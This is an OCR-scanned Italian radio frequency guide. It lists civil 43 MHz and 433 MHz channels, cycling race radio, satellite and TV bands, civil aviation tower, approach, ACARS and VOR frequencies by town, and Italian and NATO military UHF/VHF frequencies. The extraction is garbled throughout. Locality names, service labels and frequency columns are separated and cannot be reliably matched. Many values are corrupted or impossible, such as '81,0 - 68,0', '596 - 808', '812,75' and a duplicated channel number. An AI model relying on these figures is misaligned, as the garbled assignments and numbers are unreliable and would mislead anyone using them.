227.400 canale 8 469.725 canale 7 
227.800 canale 9 469.775 canale 8 
228.200 canale A 469.825 canale 9 
229.000 canale B 469 875 canale D 
230.300 canale C 469.900 canale  C 
230.900 canale D 469.925 canale A 
231.400 canale E 469.950 canale E 
231.800 canale F 469.975 canale F 


RADIO CORSA 


154.560 

154.680 

157.600 

161.087,5 
161.112,5 
161.512,5 
161.537,5 
162.087,5 
162.112,5 
162.137,5 


154.560 
154.560 
154.680 
154.680 


FEDERAZIONE CICLISTICA ITALIANA 


SERVIZI CORSE PROFESSIONISTICHE 


BANDA 156-175 MHz (servizi compresi nella gamma civile VHF) 


Link Master UHF 
Link Master UHF 
Link Master UHF 
Link Master UHF 


PARTENZA 


431.875 
432.000 
431.875 
432.000 


TRAGUARDO 


MOTOCICLISTI 


CIVILI 43MHz 
BANDA 43.300 - 43.587,5 MHz 
SERVIZI ATTUATI - CANALIZZAZIONE - RIPARTIZIONE BANDE 
L'ASSEGNAZIONE E UTILIZZO DEI CANALI DI LAVORO AWIENE A LIVELLO PROVINCIALE 


PER OGNI BACINO DI UTENZA 


PUNTO 1 
In ausilio degli addetti alla sicurezza a al soccorso sulle strade, alla vigilanza del traffico, dei trasporti a fune 
delle foreste, della disciplina della caccia, della pesca, della sicurezza notturna. 


canale 01 43.300,0 

canale 02 43.312,5 

canale 03 43.325,0 

canale 04 43.337,5 

canale 05 43 350,0 

canale 06 43.362,5 
PUNTO 2 


In ausilio alle imprese industriali artigiane, commerciali ed agricole. Nel campo dell’edilizia, costruzioni 0 
nell’ambito di aziende di ogni tipo. 


canale 07 43.375.0 

canale 08 43.387,5 

canale 09 43.400,0 

canale 10 43.412,5 

canale 11 43.425,0 

canale 12 43.437,5 
PUNTO 3 


Per la sicurezza della vita umana in mare, per emergenze fra piccole imbarcazioni e stazioni di base collocale 
esclusivamente presso sedi di organizzazioni nautiche, nonché per effettuare collegamenti 
di servizio fra diversi punti di una stessa nave, 


canale 13 43.450,0 

canale 14 43,462,5 

canale 15 43.475,0 

canale 16 43.487,5 
PUNTO 4 


In ausilio ad attività sportive ed agonistiche, apparati idonei all’impiego nel volo diporto sportivo, 
deltapleno, parapandio, voto a vela. 


canale 17 43.500,0 

canale 18 43.512,5 

canale 19 43.525,0 

canale 20 43.537,5 
PUNTO 7 


In ausilio ad attività professionali, sanitarie ed alte attività ad esse direttamente collegate. 
ospedali, unità sanitarie locali, emergenza sanitaria ecc. 


canale 21 43.550,0 
canale 22 43.562,5 
canale 23 43.575,0 


canale 24 43.587,5 


CIVILI LPD 


BANDA 433 - 435 MHz 


CANALIZZAZIONE SERVIZI ATTUATI 


PER COMUNICAZIONI A BREVE DISTANZA DI TIPO DIVERSO DA QUELLE OPERANTI 
NELLA BANDA DEI 43 MHz 


CANALE FREQUENZA CANALE FREQUENZA 
01 433.075 36 433.950 
02 433.100 37 433.975 
03 433.125 36 434 000 
04 433.150 39 434.025 
05 433.175 40 434.050 
06 433.200 41 434.075 
07 433.225 42 434.100 
08 433.250 43 434.125 
09 433.275 44 434.150 
10 433.300 45 434.175 
11 433.325 46 434.200 
12 433.350 47 434.225 
13 433.375 48 434.250 
14 433.400 49 434.275 
15 433.425 50 434.300 
16 433.450 51 434.325 
17 433.475 52 434.350 
18 433.500 53 434.375 
19 433.525 54 434.400 
20 433.550 55 434.425 
21 433.575 56 434.450 
22 433.600 57 434.475 
23 433.625 58 434.500 
24 433.650 59 434.525 
25 433.675 60 434.550 
26 433.700 61 434.575 
27 433.725 62 434.600 
26 433.750 63 434.625 
29 433.775 64 434.650 
30 433.800 65 434.675 
31 433.825 66 434.700 
32 433.850 67 434.725 
33 433.875 68 434.750 
34 433.900 69 434.775 


35 433.925 


SATELLITI 


BANDE DI FREQUENZA 


137.000 - 138 000 
149.900 - 150.050 
267.000 - 273.000 
328.600 - 355.400 
399.900 - 400.000 
400.000 - 400.150 
400.150 - 402.000 
403.000 - 405 000 
1.215.000- 1.240.000 
1.525.000- 1.545.000 
1.545.000- 1.555.000 
1.670 000- 1.710.000 
2.200.000- 2.300.000 
2 483 500- 2.500.000 


SATELLITE 


Meteor 


Meteosat 5 


Nooa 


Nooa 9 
Nooa 10 


MHz 
MHz 
MHz 
MHz 
MHz 
MHz 
MHz 
MHz 
MHz 
MHz 
MHz 
MHz 
MHz 
MHz 


FREQUENZE 


137.300 
137.400 
137.850 
1.691.000 
1.694 500 
1.698.000 
1.707.000 
137.620 
137.500 


SERVIZI ATTUATI 


Satelliti in orbita fissa 

Satelliti per radionavigazione 

Satelliti militari 

Satelliti per navigazione aeronautica 

Satelliti di navigazione 

Satelliti per segnale di tempo campione 
Satelliti di ricerca a meteorologici 

Radiosonde su palloni stratosferici 

Satelliti di navigazione 

Satelliti per comunicazioni mobili marittime 
Satelliti per comunicazioni mobili aeronautiche 
Satelliti meteorologici su orbita geostezionaria 
Comunicazioni intersatellite 

Satelliti di radiolocalizzazione 


NAZIONE 


Russia 


USA 
USA 


REPUBBLICA SAN MARINO 


Vengono riportati i servizi resisi disponibili al momento dell’impaginazione 


SERVIZIO FREQUENZA 
Emergenza Sanitaria 118 185.750 
Gendarmeria 421.650 
Ospedale 165.750 
Polizia Municipale 421.650 


Pronto Soccorso 165.750 


BANDA VHF 


1 


2 
3 


BANDE E CANALI TELEVISIVI 


BANDE - CANALIZZAZIONE - PORTANTI AUDIO 


CANALE 


A 


DL DOTNTAIDOT 
NH 


CANALIZZAZIONE ITALIANA 


BANDA INMHz 
52.5 - 59,5 
61,0 - 68,0 
81,0 - 68,0 
174 - 181 
182,5 - 189,5 
191 - 198 
200 - 207 
209 - 218 
216 - 223 
223 - 230 

BANDA UHEF 
470 - 478 
478 - 486 
486 - 494 
494 - 502 
502 - 510 
510 - 518 
518 - 528 
526 - 534 
534 - 542 
542 - 550 
550 - 558 
556 - 566 
588 - 574 
574 - 582 
582 - 590 
590 - 598 
596 - 808 
BANDA UHEF 
606 - 614 
614 - 622 
622 - 630 
630 - 638 
638 - 646 
646 - 654 
654 - 662 
662 - 670 
670 - 678 
678 - 686 
686 - 694 
694 - 702 
702 - 710 
710 - 718 
718 - 726 


PORTANTE AUDIO MHz 


59.25 

57,75 

87.75 

180,75 
189,25 
197,75 
206.75 
215,75 
222.75 
229,75 


476,75 
484,75 
492,75 
500,75 
508,75 
516,75 
524,75 
532,75 
540,75 
548,75 
556,75 
564,75 
572,75 
580,75 
588,75 
596,75 
604,75 


812,75 
620,75 
626,75 
636,75 
644,75 
652,75 
660.75 
668,75 
678,75 
684,75 
692,75 
700,75 
708,75 
716,75 
724.75 


726 
734 
742 
750 
758 
768 
774 
782 
790 
796 
806 
814 
622 
830 
838 
846 
854 


734 
742 
750 
758 
766 
744 
782 
790 
798 
806 
814 
822 
830 
838 
846 
854 
862 


732,75 
740.75 
748.75 
756,75 
764.75 
772.75 
780.75 
788,75 
796,75 
604,75 
812,75 
820,75 
828.75 
836,75 
844,75 
852,75 
860,75 


AERONAUTICA CIVILE 


BANDA 118-136 MHz 
BANDA 108 - 117 MHz _ V.0.R. (Vhf Omnidirectional Range) 


LINK MASTER UHF - LIMITI DI BANDA 225 - 399.950 MHz 
OPERATIVI NEGLI AEROPORTI DI : 
BOLOGNA BRINDISI MILANO NAPOLI PADOVA ROMA TREVISO 


VOLMET (Servizi Metereologici di volo) 
Brindisi 127.600 - Milano 126.600 - Pisa 128.400 - Roma 126.000 


F.I.S. (Flight Information Service) 
Brindisi 131.200 - Milano 134.300 - Padova 124.150 - Roma 126.750 


ENTI REGIONALI CONTROLLO TRAFFICO AEREO 
Garda 124.250 - 124.450 - 124.850 - Romagna 118.150 - 124.850 


S.A.R. (Soccorso Aereo) 
PER SCOPI DI SICUREZZA CON STAZIONI MOBILI MARITTIME 
Cagliari 123.100 - Martina Franca 123.100 - Padova 123.100 - Rimini 123.100 


AIR to AIR 
118.350 - 122.700 - 122.750 - 122.800 - 123.450 - 131.800 
AEREI MINISTERO DEGLI INTERNI 130.450 
EMERGENZA INTERNAZIONALE 121.500 - 123.100-(ausiliaria) 
AEROPORTI 
LISTA DELLE FREQUENZE VHF USATE NEI COLLEGAMENTI T/B/T 
DEGLI ENTI DI CONTROLLO DEL TRAFFICO AEREO 
E RADIOASSISTENZE USATE NELLA NAVIGAZIONE AEREA 

LOCALITA’ SERVIZIO ATTUATO FREQUENZA 
Acqui Terme Radio Aviosuperficie 127.000 
Agrigento Torre di controllo 118.850 
Albenga Radio 123.850 


Alessandria Radio 126.900 


Alghero 


Alzate Brianza 
Ancona 


Aosta 
Aquino 
Arezzo 
Asiago 
Bari 


Belluno 
Bergamo (località Orio al Serio) 


Biella 


Bologna 


Bolzano 

Brescia (località Montichiari) 
Bresso 

Brindisi 


Brindisi 


Budrione (località Carpi) 
Cagliari 


Caiolo 


Torre di controllo 
Controllo di avvicinamento 
Controllo di avvicinamento 
Acars (stand-by) 
Acars 
Radio 
Torre di controllo 
Acars (stand-by) 
Acars 
Eliporto 
Radio 
Radio 
Radio 
Radio 
Torre di controllo 
Controllo di avvicinamento 
Acars (stand-by) 
Acars 
Radio 
Torre di controllo 
Torre di controllo (riserva) 
Aeroclub 
Acars (stand-by) 
Acars 
COMPAGNIE AEREE DI BANDIERA 
Alitatia operativo azzurra’ 
Air One operativo aquila’ (coord. voli) 
Lufthansa 
Radio 
Radio 
Torre di controllo 
Torre di controllo (riserva) 
Controllo di avvicinamento 
Acars (stand-by) 
Acars 
Eliporlo (militare) 
COMPAGNIE AEREE DI BANDIERA 
Alitalia operativo azzurra’ 
Lufthansa 
Radio 
Radio Aeroclub 
Radio 


ENTE REG. CONTROLLO TRAFFICO AEREO 


Radar 

Radar 

Radar 

Radar 

Informazioni di volo 

Torre di controllo 
Controllo di avvicinamonto 
Controllo di avvicinamento 
Radar di precisione in avvicinamento 
Acars (stand-by) 

Acars 

Radio 

Torre di controllo 
Controllo di avvicinamento 
Controllo di terra 

Acars (stand-by) 

Acars 

Soccorso Aereo 

Radio 


118.850 
118.660 
128.550 
131.525 
131.725 
123.500 
119.800 
131.525 
131.725 
122.500 
119.950 
126.900 
126.900 
122.600 
118.300 
119.500 
131.525 
131.725 
119.650 
120.500 
126.500 
120.500 
131.525 
131.725 


131.550 
131.550 
131.550 
123.050 
123.500 
120.800 
129.900 
120.100 
131.525 
131.725 
129.900 


131.400 
131.850 
120.600 
119.400 
122.000 


124.750 
132.300 
132.450 
134.670 
131.200 
118.100 
118.400 
121.000 
119.900 
131.525 
131.725 
119.650 
120.600 
115.750 
121.600 
131.525 
131.725 
123.100 
129.500 


Calcinate del Pesce 
Cà Negra 

Capena 

Capri 

Capua 

Casale Monferrato 
Cascina Costa 


Castel Viscardo 


Castiglione del Lago 
Catania 


Celano 
Consalvo 
Clusone 

Como 

Corfino 

Costa d’ Argento 
Cremona 
Crotone 

Cuneo 

Cuvio 


Falconara (località Ancona) 


Fano 
Ferrara 
Firenze 


Foggia 


Foligno 
Forlì 


Frosinone 


Radio 
Radio 
Radio 
Eliporto 
Radio 
Radio 
società Agusta 
società Agusta 
società Agusta 
società Agusta 
Radio 
Radio (da verificare) 
Radio 
Torre di controllo 
Controllo di avvicinamento 
Controllo di avvicinamento 
Controllo di terra 
Controllo di terra 
Acars (stand-by) 
Acars 
COMPAGNIE AEREE DI BANDIERA 
Alitalia operativo azzurra” 
Radio 
Radio 
Eliporto 
Radio 
Radio 
Radio 
Radio 
Radio 
Radio 
Radio Aviosuperficie 
Torre di controllo 
Acars (stand-by) 
Acars 
Radio 
Radio 
Torre di controllo 
Acars (stand-by) 
Acars 
COMPAGNIE AEREE DI BANDIERA 
Alitalia “operativo azzurra” 
Compagnia non identificate (bollettino meteo) 
Torre di controllo 
Centro informazioni di volo 
Acars (stand-by) 
Acars 
Radio 
Torre di controllo 
Torre di controllo Aeroclub 
Radio 
Acars (stand-by) 
Acars 
Torre di controllo 
Controllo di avvicinamento 
Controllo di terra 
Gardolo Radio 
Genova Torre di controllo 
Controllo di avvicinamento 
Controllo di avvicinamento (stand-by) 
Acars (stand-by) 
Acars 


123.500 
120.200 
122.650 
123.500 
122.500 
123.570 
121.600 
123.750 
126.200 
127.500 
130.000 
126 950 
123.500 
118.700 
119.250 
120.600 
121.600 
129.720 
131.525 
131.725 


131.475 
130.000 
130.000 
123.500 
121.000 
130.000 
130.000 
119.650 
119.100 
119.550 
120.350 
119.600 
131.525 
131.725 
119.650 
122.500 
118.300 
131.525 
131.725 


131.475 
120.200 
116.200 
120.100 
131.525 
131.725 
119.550 
118.950 
119.750 
133.300 
131.525 
131.725 
122.600 
119.350 
126.500 
119.650 
116.600 
119.600 
119.850 
131.525 
131.725 


Gorizia 
Grosseto 


Grottaglie 
Guidonia 

Ivrea 

il Borro 

Ischia 

Lamezia Terme 


Lempedusa 
Latina 


Lecce 


Lecce (località San Cataldo) 
Legnago 

Lucca 

Lugo di Romagna 
Manduria 

Marina di Campo 


Martina Franca 


Massa 
Matera 
Mattarello 
Milano 


Milano (Linate) 


COMPAGNIE AEREE DI BANDIERA 
Alitalia ‘operativo azzurra” 
Iberia 
Compagnia (non identificata) 
Radio 
Torre di controllo 
Controllo di avvicinamento 
Torre di controllo 
Radio 
Radio 
servizio (non disponibile) 
Eliporto 
Torre di controllo 
Torre di controllo 
Controllo di avvicinamento 
Controllo di avvicinamento 
Radio 
Moro - Campo 
Torre di controllo 
Controllo di avvicinamento 
Torre di controllo 
Controllo di avvicinamento 
Acars (stand-by) 

Acars 

Radio 

Radio 

Radio 

Radio 

Radio 

Elba Radio 

Elba Torre di controllo 
Radio 

Soccorso aereo 

Radio 

Torre di controllo 
Radio 

ENTE REG. CONTROLLO TRAFFICO AEREO 
Radar 

Radar 

Radar 

Radar 

Radar 

informazioni di volo 
Radar 

Radar 

Radar 

Torre di controllo 
Torre di controllo (riserva) 
Arrivi 

Arrivi 

Partenze 

Controllo di terra 
Servizio manutenzione aerei 
Acars (stand-by) 
Acars 

COMPAGNIE AEREE DI BANDIERA 
Alitalia "operativo azzurra 
Air Franca 
Alilalia operativo azzurra" (coord. voli MI-Roma) 
Air One “operativo aquila” (coordinamento voli) 
Twa 
Compagnie (non identificate) 


131.450 
131.650 
131.600 
119.650 
128.100 
124.520 
118.700 
122.200 
130.000 
123.450 
126.900 
119.700 
121.500 
118.800 
121.100 
123.500 
130.170 
119.150 
126.550 
119.550 
118.950 
131.525 
131.725 
119.650 
122.600 
122.500 
119.650 
122.500 
123.700 
119.050 
121.300 
123.100 
120.350 
122.500 
119.650 


125.270 
127.450 
130.170 
132.900 
134.050 
134.300 
134.520 
135.120 
135.450 
118.100 
119.250 
126.300 
126.750 
132.700 
121.800 
131.850 
131.525 
131.725 


131.475 
131.500 
131.550 
131.550 
131.600 
131.600 


Milano (Malpensa) 


Modena (località Marzaglia) 
Molinella 

Monte Marenzo 
Montegaldelle 

Monteverdi Marittimo 
Napoli 


Novi Ligure 
Olbia 


Orbassano 
Oristano 
Ozzano dall’Emilia 


Padova 


Aviazione Generale 131.625 
Air France 131.650 
Iberia 131.650 
Klm 131.650 
Sabena 131.650 
Compagnie (non identificate) 131.650 
Alitalia operativo azzurra” (coordinamento voli) 131.675 
Olimpic 131.700 
Scandinavian Air Lines 131.700 
Swissair 131.700 
Compagnie (non identificate) 131.700 
Compagnie (non identificate) 131.800 
Lufthansa 131.925 
Torre di controllo 119.000 
Torre di controllo (riserva) 128.350 
Controllo di terra (da verificare) 121.600 
Controllo di terra 121.900 
Acars (stand-by) 131.525 
Acars 131.725 
COMPAGNIE AEREE DI BANDIERA 
Alitalia “operativo azzurra’ 131 .450 
Alitalia “operativo azzurra” 131.475 
Alitalia “operativo azzurre” (coordinamento voli) 131.550 
Air One “operativo aquila” (coordinamento voli) 131.550 
Twa 131.600 
Radio 119.550 
Radio 126.900 
Radio Aviosuperficie 130.000 
Radio 130.000 
Radio 130.090 
Torre di controllo 118.500 
Controllo di avvicinamento 120.950 
Controllo di avvicinamento 124.350 
Inserimento radar aereo in avvicinamento 118.300 
Napoli direttore 120.950 
Controllo di terra 121.900 
Terminale automatico d’informazione 135.970 
Acars (stand-by) 131.525 
Acars 131.725 
COMPAGNIE AEREE DI BANDIERA 
Alitalia “operativo azzurra” 131.750 
Radio 122.590 
Torre di controllo 125.950 
Controllo di avvicinamento 118.250 
COMPAGNIE AEREE DI BANDIERA 
Alitalia “operativo azzurra” 131.475 
Meridiana 131.475 
Geasar 131.670 
Radio 119.850 
Radio 122.600 
Radio 128.450 
Radio 130.000 
ENTE REGIONALE CONTROLLO TRAFFICO AEREO 
Radar 120.725 
Radar 124.150 
Radar 124.700 
Radar 124.750 
Rader 125.470 
Radar 125.900 
Radar 133.300 
Radar 133.700 
Radar 134.625 


Padova 


Palermo 


Pantelleria 


Parma 

Pavullo nel Frignano 
Perugia 

Pescara 


Pianezza 


Pianosa 
Pisa 


Poggio Renatico 


Pontedera 

Prati Vecchi di Aguscello 
Preturo 

Ravenna 

Reggio Calabria 

Reggio Emilia 

Rieti 

Rimini 


Rivaltella 
Rivanazzano 
Roma 


Radar 
Radar 
Torre di controllo 
Acars (stand-by) 
Acars 

Soccorso Aereo 
Bollettino meteo 
Torre di controllo 
Controllo di avvicinamento 
Controllo di avvicinamento 
Acars (stand-by) 
Acars 
Radio (Bocca di Falco) 
Torre di controllo 
Radar Moro Campo 
Radio 

Radio 
Radio 

Torre di controllo 
Controllo di avvicinamento 
Acars (stand-by) 
Acars 

Scuola volo ULM 

Scuola volo ULM 
Radio 
Torre di controllo 
Controllo di avvicinamento 
Controllo di avvicinamento 
Controllo di avvicinamento 
Controllo di avvicinamento (stand-by) 
Inserimento radar aereo in avvicinamento 
Controllo di terra 
Acars (stand-by) 
Acars 

COMPAGNIE AEREE DI BANDIERA 
Alitalia operativo azzurra" 
Radio 
Radio Aeroclub 
Radio 

Radio 
Radio 
Radio 
Torre di controllo 
Radio 
Radio 
Torre di controllo 
Inserimento radar aereo in avvicinamento 
Controllo di terra 
Acars (stand-by) 
Acars 

Soccorso Aereo 

Scuola elicotteristi 
Radio 


134.750 
135.000 
123.250 
131.525 
131.725 
123.100 
120.200 
119.050 
118.650 
120.200 
131.525 
131.725 
122.600 
116.450 
130.170 
118.450 
122.600 
118.100 
118.450 
120.050 
131.525 
131.725 
142.120 
142.165 
122.500 
119.100 
124.270 
126.050 
126.070 
121.300 
118.200 
121.600 
131.525 
131.725 


131.775 
122.500 
124.525 
123.500 
122.600 
122.500 
123.500 
118.300 
127.150 
123.050 
119.100 
119.250 
121.600 
131.525 
131.725 
123.100 
122.000 
123.000 


ENTE REGIONALE CONTROLLO TRAFFICO AEREO 


Informazioni di volo (stand-by) 

Radar 

Radar 

Radar 

Radar 

Centro informazioni di volo (solo VFR) 
Radar 

Radar 


122.400 
124.200 
124.800 
125.450 
125.500 
125.750 
127.350 
127.950 


Roma (Fiumicino) 


Roma (Ciampino) 


Roma (Urbe) 


Ronchi dei Legionari 


Salerno 
Salgareda 


San Giustino Valdarno 
Sant'Eufemia Lamezia 


Sarzana 


Radar 

Radar 

Rader 

Radar 

Radar 

Radar 

Radar 

Radar 

Radar 

Radar 

Torre di controllo 
Torre di controllo 
Arrivi 

Partenze 
Controllo di terra 
Controllo di terra 
Vdf 


Terminale automatico d’informazione 


Acars (stand-by) 
Acars 


COMPAGNIE AEREE Di BANDIERA 
Alitalia operativo azzurra’ 


Air France 


Air One ‘operativo aquila” 
Alitalia “operativo azzurra’ (coord. voli Roma-MI) 


Ati 


Aviazione Generale aeroporti di Roma 


Iberia 
Klm 
Sabena 


Alitalie “Operativo azzurra” (coordinamento voli) 


Olimpic 


Scandinavian Air Lines 


Swissair 


Compagnia (non identificata) 


Lufthansa 

Torre di controllo 
Arrivi 

Partenze 
Controllo di terra 
Controllo di terra 
Controllo di terra 
Acars (stand-by) 
Acars 


COMPAGNIE AEREE DI BANDIERA 
Alitalia “operativo azzurra” (coord. voli Roma-MI) 
Aviazione Generale aeroporti di Roma 


Iberia 
Klm 
Sabena 


Altre compagnie (non identificate) 


Torre di controllo 
Controllo di terra 
Torre di controllo 


Controllo di avvicinamento 
Alitalia “operativo azzurra” 


Radio 


Radio Aviosuperficie 


Radio 
Torre di controllo 


Controllo di avvicinamento 


Radio 


128.600 
129.000 
131.250 
132.025 
132.075 
132.520 
133.120 
133.250 
134.200 
135.700 
118.700 
119.300 
119.200 
130.900 
121.800 
121.900 
118.900 
121.700 
131.525 
131.725 


131.450 
131.500 
131.550 
131.550 
131.550 
131.825 
131.650 
131.650 
131.650 
131.675 
131.700 
131.700 
131.700 
131.800 
131.925 
120.500 
119.200 
130.900 
119.400 
121.750 
131.620 
131.525 
131.725 


131.550 
131.625 
131.650 
131.650 
131.650 
131.650 
123.800 
122.700 
130.200 
119.150 
131.750 
118.100 
118.000 
123.450 
119.700 
118.800 
119.650 


Sassuolo 
Siena 
Sigonella 


Thiene 
Torino 


Torino (Aeritalia) 
Tortoli 


Trapani 


Treviso 


Trieste 

Udine 
Velbrembo 
Val della Torre 
Valle dei laghi 
Varese 
Venegono 
Venezia 


Vercelli 
Vergiate 
Verona 


Radio 

Radio 

Torre di controllo 

Controllo di avvicinamento 
Radar 

Catania direttore 

Controllo di terra 

Radio 

Torre di controllo 

Radar (riserva) 

Radar 

Acars (stand-by) 

Acars 

Alenia (stazione talemetria EFA) 
Fiat (Caselle) 
COMPAGNIE AEREE DI BANDIERA 
Alitalia operativo azzurra’ 
Lufthansa 

Atis 

Radio 

Centro informazioni di volo 
Radio 

Radio 

Torre di controllo 

Controllo di avvicinamento 
Controllo di terra 

Acars (stand-by) 

Acars 

Torre di controllo 

Controllo di avvicinamento 
Controllo di avvicinamento 
Controllo di terra 

Controllo di terra 

Acars (stand-by) 

Acars 

Radio 

Radio 

Radio 

Scuola volo ULM 

Radio 

Radio 

Radio 

Torre di controllo 

Radar in avvicinamento 
Controllo di terra 

Acars (stand-by) 

Acars 

Radio (Venezia Lido) 
COMPAGNIE AEREE DI BANDIERA 
Alitalia “operativo azzurra” 
Air Franca 

Alitalia "operativo azzurra” (coordinamento voli) 
Air One “operativo aquila” (coordinamento voli) 
Alpi Eagles 

Aviazione Generale 
Lufthansa 

Compagnia (non disponibile) 
Radio 

Radio 

Torre di controllo 

Radar 

Controllo di terra 


124.000 
122.600 
118.050 
118.100 
119.250 
120.800 
121.950 
121.650 
116.500 
120.150 
121.100 
131.525 
131.725 
130.675 
122.950 


131.900 
131.900 
133.950 
121.100 
119.150 
119.500 
119.650 
119.700 
119.950 
122.800 
131.525 
131.725 
116.700 
120.400 
121.150 
122.300 
122.750 
131.525 
131.725 
119.150 
119.050 
122.600 
142.670 
130.000 
119.500 
128.550 
120.200 
118.900 
121.700 
131.525 
131.725 
120.000 


131.475 
131.500 
131.550 
131.550 
131.550 
131.575 
131.925 
131.975 
122.600 
119.770 
116.650 
118.550 
121.750 


Vibo Valentia 
Vicenza 
Viterbo 
Vizzola Ticino 
Voghera 


Acars (stand-by) 

Acars 

Radio (Boscomantico) 
COMPAGNIE AEREE DI BANDIERA 
Alitalia ‘operativo azzurra” 
Radio 

Torre di controllo 

Torre di controllo 

Radio 

Radio 

Radio 


131.525 
131.725 
122.050 


131.475 
119.650 
130.400 
127.150 
122.500 
119.650 
123.000 


RADIOFARI OMNIDIREZIONALI 
V.0.R. VHF OMNIDIRECTIONAL RANGE 


LOCALITA' NOMINATIVO FREQUENZA 
Alghero ALG 113.800 
Ancona ANC 117.600 
Bari BAI 115.300 
Bologna BOA 112.200 
Bolsena BOL 114.400 
Brindisi BRD 113.200 
Cagliari CAG 113.400 
Campagnano CMP 111.400 
Caraffa CDC 117.300 
Carbonara CAR 115.100 
Catania CAT 112.100 
Chioggia CHI 114.100 
Crotone CRO 110.600 
Elba ELB 114.700 
Firenze FRZ 115.200 
Foggia FOG 114.200 
Genova GEN 112.800 
Lamezia LMT 112 500 
Lampedusa LPD 108.600 
Lalina LAT 111.200 
Linate LIN 116.000 
Malpensa MAL 111.200 
Napoli NPL 115.800 
Olbia SME 113.900 
Orio al Serio ORI 112.600 
Ostia OST 114.900 
Palermo PAL 112.300 
Pantelleria PAN 116.100 
Peretola PRT 112.500 
Perugia PRU 109.400 
Pescara PES 115.900 
Pisa PIS 112.100 
Ponza PNZ 114.600 
Punta Raisi PRS 113.000 
Reggio Calabria RCA 111.000 
Rimini RIM 116.200 
Ronchi dei Legionari RON 114.200 
Saronno SRN 113.700 
Sorrento SOR 112.200 
Tarquinia TAQ 111.800 
Teano TEA 112.900 
Torino TOP 114.500 
Trapani TRP 108.800 
Trazzo ITZO 111.800 
Verona VIL 115.800 
Vicenza VIC 113.400 
Vieste VIE 112.600 


Voghera VOG 115.500 


AERONAUTICA MILITARE 


BANDA 225.000 - 399.950 MHz 


VENGONO RIPORTATE LE FREQUENZE ADIBITE AL TRAFFICO INTERNAZIONALE “NATO” 


I PRINCIPALI AEROPORTI ITALIANI CON TRAFFICO MILITARE VHE-UHE 


FREQUENZE IN USO ALL’AERONAUTICA LEGGERA DELL’ESERCITO 


LIMITI DI BANDA PER SERVIZI OPERATIVI DI TERRA 


SONO INOLTRE INSERITE FREQUENZE IN USO ALLA MARINA MILITARE 


CON SERVIZI ASSEGNATI IN BANDA 225 399 950 MHz 


CON L'ESCLUSIONE DEI CANALI DI LAVORO E SERVIZI IN ESSI ATTUATI 


AEROPORTI 
AEROPORTI BANDA FREQUENZE 
Tutti Traffico “Nato" UHF 243.000 243400 244600 252.500 252.600 253800 257.800 
256.450 259.150 259400 262.600 273900 277200 285.350 
292.100 299600 300.800 316.350 317500 340.300 344.000 
344.350 360.400 362.300 364.200 383.550 385.400 
Aviano UHF 243.000 252.525 257.750 257800 259.050 260.925 300.600 
312.650 319.400 337.825 338.825 344.000 360.775 362.300 
376.550 379.425 385.400 386.675 
VHF 120.125 122.100 123.300 129.300134.100 138.150 138.350 
140.425 142.050 
Bari VHEF 122.100 123.300 130.650 141.300 
Brindisi UHF 243.000 257.800 259.000 261.000 312.550 338.750 344.000 
362.150 358.600 362.300 369.950 376 800 383.200 385.400 
365.400 
VHEF 122.100 122.400 123.300 129.775 142.350 
Cagliari VHEF 122.100 123.300 142.400 
Cameri UHF 243.000 257.800 261350 300.250 300.950 309.050 340150 
344.000 364.200 370.100 385.400 
VHEF 121.700 122.100 123.300 142.300 
Catania UHF 243.000 257.800 256 450 344.000 344 300 362.300 364.200 
381.200 365.400 
Cervia UHEF 243.000 257.800 258.450 258.950 292.750 312.850 336.000 
338.260 338.900 344.000 362.300 364.200 379.750 385.400 
Decimomannu UHEF 243.000 257.600 259.850 299.400 315.550 344.000 351.000 
358.600 362.300 385.400 
VHF 122.100 123.300 140.400 142.400 
Foggia UHF 243.000 257.800 258.450 259.800 209 400 337.600 344.000 
360 550 362.300 364.200 381.200 385.400 
Forlì UHF 243.000 257 800 338.650 344.000 362.300 379.650 385.400 
Ghedi UHF 243.000 257.800 292.700 311.350 338.000 362.000 344.000 
362.300 385.400 386.500 
VHF 122.100 123.300 123.500 
Gioia del Colle UHF 243.000 257.800 258.450 338.000 340.000 344.000 362.300 


364.200 380.050 383.450 385.400 386.650 


VHE 
Grazzanise UHF 
VHE 
Guidonia VHE 
Istrana UHE 
VHE 
Latina VHEF 
Milano VHE 
Napoli UHF 
Padova UHF 
VHE 
Pisa UHF 
VHE 
Pratica di Mare VHE 
Rimini VHE 
Rivolto UHF 
VHE 
Roma UHE 
VHE 
San Damiano VHE 
Sigonella VHEF 
Trapani VHF 


Nato — USAF Awacs” 
Comp. Grp. Elicotteri Sarzana 
SAR Nato 

Italia Navy (Maritele Roma) 
USAF (Usareur) Vicenza 
Nato — USAF ‘Awacs 

Nato 

Monte Venda 

Sarzana Luni (Maristaeli) 
Nato — USAF Awacs’ 
Aeronautica Leggera Esercito 
Marina Militare Italia 

Marina Militare Italia 

Padova SAR (da verificare) 
Coord Capitanerie Porto SAR 
Monte Venda 

Monte Corna 

Monte Limbara 

Monte Nardello 

Marina Militare Italia 

Marina Militare Italia 
Pattuglia Acrobatica Italia 
Nato — USAF Awacs’ 


Monte Venda 


122.100 122.450 123.300 130.650 141.300 

243.000 257.800 258.450 338.000 344.000 358.600 362.000 
362.300 364.200 369.900 385.400 

122.100 123.300 139.850 140.400 

122.100 123.300 142.350 

243.000 257.800 284.850 337.950 338.550 340.300 348.850 
356.800 364.200 388.000 

118.350 121.725 122.100 123.300 123.800 

122.100 123.300 142.400 

122.100 122.400 123.300 129.820 

243.000 257.800 340.200 341.000 344.000 358.550 362.300 
377.800 379.000 383.800 384.250 385.400 

235.150 243.000 252.450 257.800 291.150 344.700 373.450 
379.600 384.200 

122.100 123.175 123.300 129.375 

243.000 257.800 258.450 338.550 344.000 344.600 362.000 
362.300 384.200 385.400 

122.100 123.300 138.250 139.400 146.500 

122.100 123.300 139.450 

121.600 122.100 123.300 

243.000 257.800 261 000 307.800 315.700 

122.100 123.300 139.250 142.750 

232.600 243.000 258.200 257.800 296.650 314.350 340.300 
344.450 362.300 379.400 

122.100 123.225 123.300 

122.100 123.300 123.920 129.820 132.250 134.250 
118.050 118.200 122.100 123.300 

122.100 123.300 141.150 


SERVIZI UHF-VHF VARI 


Coord. Aviolanci Paracad. Pisa UHF 
Coord. Tecnici Telecomunicaz.  UHF 


233.600 
242.300 
252.800 
253.950 
255.500 
259.300 
264.400 
265.200 
267.600 
270.050 
277.200 
278.300 
279.400 
282.200 
282.800 
282.800 
290.700 
290.700 
290.700 
291.500 
294.950 
307.800 
311.000 
337.700 
345.675 
355.600 


Aeronautica Leggera Esercito UHF 357.150 


AMI nazionale VHF 130.450 
USAF (Località imprecisata) VHEF 136.200 
Località imprecisata VHF 136.500 
Località imprecisata VHF 137.000 
